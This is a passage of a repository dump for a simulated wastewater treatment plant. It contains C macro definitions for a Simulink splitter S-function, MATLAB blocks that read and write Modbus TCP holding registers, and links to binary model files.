PARAMS_SPLITTER(S) ssGetSFcnParam(S,0) 24 | 25 | // Dimensiones de los Vectores de Parametros 26 | #define DIMPARAMS_SPLITTER 1 27 | 28 | #define NUMPWORKS 1 29 | #define PARAM_SPLT ((real_T *)PWork[0]) 30 | 31 | // Par�metros 32 | #define FQ_O1 PARAM_SPLT[0] 33 | 34 | 35 | // _____________________________________________________________________ 36 | 37 | // PUERTOS DE ENTRADAS 38 | #define Q_IN (*uPtrs0[0]) 39 | #define SS_IN (*uPtrs0[1]) 40 | #define SO_IN (*uPtrs0[2]) 41 | #define SI_IN (*uPtrs0[3]) 42 | #define SNO_IN (*uPtrs0[4]) 43 | #define SNH_IN (*uPtrs0[5]) 44 | #define SND_IN (*uPtrs0[6]) 45 | #define SALK_IN (*uPtrs0[7]) 46 | #define XI_IN (*uPtrs0[8]) 47 | #define XS_IN (*uPtrs0[9]) 48 | #define XBH_IN (*uPtrs0[10]) 49 | #define XBA_IN (*uPtrs0[11]) 50 | #define XP_IN (*uPtrs0[12]) 51 | #define XND_IN (*uPtrs0[13]) 52 | #define XIN_IN (*uPtrs0[14]) 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/Two Relative Splitter/TWO_REL_SPLITTER.mexa64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/mex-functions/Two Relative Splitter/TWO_REL_SPLITTER.mexa64 -------------------------------------------------------------------------------- /wwtp/simulink/modbus-connector/modbusMatLib.slx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/modbus-connector/modbusMatLib.slx -------------------------------------------------------------------------------- /wwtp/simulink/modbus-connector/modbus_read.m: -------------------------------------------------------------------------------- 1 | function modbus_read(block) 2 | setup(block); 3 | function Start(block) 4 | address = block.DialogPrm(2).Data; 5 | port = block.DialogPrm(3).Data; 6 | ModBusTCP = openConnection(address, port); 7 | set_param(block.BlockHandle, 'UserData', ModBusTCP); 8 | function Outputs(block) 9 | block.OutputPort(1).Data = block.Dwork(1).Data; 10 | function Update(block) 11 | ModBusTCP = get_param(block.BlockHandle, 'UserData'); 12 | registry = block.DialogPrm(1).Data; 13 | %target = block.DialogPrm(2).Data; 14 | target = 'holdingregs' 15 | response = readFloating(ModBusTCP, target, registry); 16 | block.Dwork(1).Data = double(response); 17 | 18 | function setup(block) 19 | block.NumInputPorts = 0; 20 | block.NumOutputPorts = 1; 21 | block.SetPreCompPortInfoToDefaults; 22 | block.OutputPort(1).DatatypeID = 0; % double 23 | block.OutputPort(1).Complexity = 'Real'; 24 | block.NumDialogPrms = 3; 25 | block.DialogPrmsTunable = {'Nontunable','Nontunable','Nontunable'}; 26 | block.SampleTimes = [-1 0]; 27 | block.SetAccelRunOnTLC(false); 28 | block.RegBlockMethod('SetInputPortDimensions', @SetInpPortDims); 29 | block.RegBlockMethod('SetInputPortDataType', @SetInpPortDataType); 30 | block.RegBlockMethod('SetOutputPortDimensions', @SetOutPortDims); 31 | block.RegBlockMethod('SetOutputPortDataType', @SetOutPortDataType); 32 | block.RegBlockMethod('PostPropagationSetup', @DoPostPropSetup); 33 | block.RegBlockMethod('ProcessParameters', @ProcessPrms); 34 | %block.RegBlockMethod('InitializeConditions', @InitializeConditions); 35 | block.RegBlockMethod('Start', @Start); 36 | block.RegBlockMethod('Outputs', @Outputs); 37 | block.RegBlockMethod('Update', @Update); 38 | 39 | function ProcessPrms(block) 40 | block.AutoUpdateRuntimePrms; 41 | 42 | function SetInpPortDims(block, idx, di) 43 | block.InputPort(idx).Dimensions = di; 44 | block.OutputPort(1).Dimensions = di; 45 | 46 | function SetInpPortDataType(block, idx, dt) 47 | block.InputPort(idx).DataTypeID = dt; 48 | block.OutputPort(1).DataTypeID = dt; 49 | 50 | function SetOutPortDims(block, idx, di) 51 | block.OutputPort(idx).Dimensions = di; 52 | block.InputPort(1).Dimensions = di; 53 | 54 | function SetOutPortDataType(block, idx, dt) 55 | block.OutputPort(idx).DataTypeID = dt; 56 | block.InputPort(1).DataTypeID = dt; 57 | 58 | function DoPostPropSetup(block) 59 | block.NumDworks = 1; 60 | block.Dwork(1).Name = 'result'; 61 | block.Dwork(1).Dimensions = 1; 62 | block.Dwork(1).DatatypeID = 0; % double 63 | block.Dwork(1).Complexity = 'Real'; % real 64 | block.Dwork(1).UsedAsDiscState = true; 65 | block.AutoRegRuntimePrms; 66 | 67 | function ModBusTCP = openConnection(ipaddress, port) 68 | ModBusTCP=modbus('tcpip', ipaddress, port); 69 | ModBusTCP.ByteOrder='big-endian'; 70 | 71 | function response = readFloating(ModBusTCP, target, registry) 72 | %value = read(ModBusTCP, target, registry) 73 | % value2 = fwrite(ModBusTCP, value,'int16'); 74 | % disp(value2) 75 | % msb = fread(ModBusTCP, 1, 'int16'); 76 | % disp(msb) 77 | % lsb = read(value, 1, 'int16'); 78 | % float_num = int16([msb lsb]); 79 | % response = typecast(float_num, 'single'); 80 | response = read(ModBusTCP, target, registry, 1, 'single') 81 | 82 | 83 | -------------------------------------------------------------------------------- /wwtp/simulink/modbus-connector/modbus_write.m: -------------------------------------------------------------------------------- 1 | function modbus_write(block) 2 | setup(block); 3 | function Start(block) 4 | address = block.DialogPrm(2).Data; 5 | port = block.DialogPrm(3).Data; 6 | ModBusTCP = openConnection(address, port); 7 | set_param(block.BlockHandle, 'UserData', ModBusTCP); 8 | function Outputs(block) 9 | block.OutputPort(1).Data = block.Dwork(1).Data; 10 | function Update(block) 11 | ModBusTCP = get_param(block.BlockHandle, 'UserData'); 12 | registry = block.DialogPrm(1).Data; 13 | value = single(block.InputPort(1).Data); 14 | %target = block.DialogPrm(4).Data; 15 | target = 'holdingregs' 16 | writeModBus(ModBusTCP, target, registry, value); 17 | 18 | function setup(block) 19 | block.NumInputPorts = 1; 20 | block.NumOutputPorts = 1; 21 | block.SetPreCompPortInfoToDefaults; 22 | block.InputPort(1).DatatypeID = 0; 23 | block.InputPort(1).Complexity = 'Real'; 24 | block.OutputPort(1).DatatypeID = 1; 25 | block.OutputPort(1).Complexity = 'Real'; 26 | block.NumDialogPrms = 3; 27 | block.DialogPrmsTunable = {'Nontunable','Nontunable','Nontunable'}; 28 | %block.NumContStates = 1; 29 | block.SampleTimes = [-1 0]; 30 | block.SetAccelRunOnTLC(false); 31 | block.RegBlockMethod('SetInputPortDimensions', @SetInpPortDims); 32 | block.RegBlockMethod('SetInputPortDataType', @SetInpPortDataType); 33 | block.RegBlockMethod('SetOutputPortDimensions', @SetOutPortDims); 34 | block.RegBlockMethod('SetOutputPortDataType', @SetOutPortDataType); 35 | block.RegBlockMethod('PostPropagationSetup', @DoPostPropSetup); 36 | block.RegBlockMethod('ProcessParameters', @ProcessPrms); 37 | %block.RegBlockMethod('InitializeConditions', @InitializeConditions); 38 | block.RegBlockMethod('Start', @Start); 39 | block.RegBlockMethod('Outputs', @Outputs); 40 | block.RegBlockMethod('Update', @Update); 41 | 42 | function ProcessPrms(block) 43 | block.AutoUpdateRuntimePrms; 44 | 45 | function SetInpPortDims(block, idx, di) 46 | block.InputPort(idx).Dimensions = di; 47 | block.OutputPort(1).Dimensions = di; 48 | 49 | function SetInpPortDataType(block, idx, dt) 50 | block.InputPort(idx).DataTypeID = dt; 51 | block.OutputPort(1).DataTypeID = dt; 52 | 53 | function SetOutPortDims(block, idx, di) 54 | block.OutputPort(idx).Dimensions = di; 55 | block.InputPort(1).Dimensions = di; 56 | 57 | function SetOutPortDataType(block, idx, dt) 58 | block.OutputPort(idx).DataTypeID = dt; 59 | block.InputPort(1).DataTypeID = dt; 60 | 61 | function DoPostPropSetup(block) 62 | block.NumDworks = 1; 63 | block.Dwork(1).Name = 'result'; 64 | block.Dwork(1).Dimensions = 1; 65 | block.Dwork(1).DatatypeID = 1; % single 66 | block.Dwork(1).Complexity = 'Real'; % real 67 | block.Dwork(1).UsedAsDiscState = true; 68 | block.AutoRegRuntimePrms; 69 | 70 | function ModBusTCP = openConnection(ipaddress, port) 71 | ModBusTCP=modbus('tcpip', ipaddress, port); 72 | ModBusTCP.ByteOrder='big-endian'; 73 | 74 | function writeModBus(ModBusTCP, target, registry, value) 75 | write(ModBusTCP, target, registry, value, 'single') -------------------------------------------------------------------------------- /wwtp/simulink/modbus-connector/write_to_workspace.mat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/modbus-connector/write_to_workspace.mat -------------------------------------------------------------------------------- /wwtp/simulink/slprj/sim/varcache/implementacion_r2022a/checksumOfCache.mat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/slprj/sim/varcache/implementacion_r2022a/checksumOfCache.mat -------------------------------------------------------------------------------- /wwtp/simulink/slprj/sim/varcache/implementacion_r2022a/tmwinternal/simulink_cache.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | false 5 | 6 | -------------------------------------------------------------------------------- /wwtp/simulink/slprj/sim/varcache/implementacion_r2022a/varInfo.mat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/slprj/sim/varcache/implementacion_r2022a/varInfo.mat -------------------------------------------------------------------------------- /wwtp/simulink/test.slx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/test.slx --------------------------------------------------------------------------------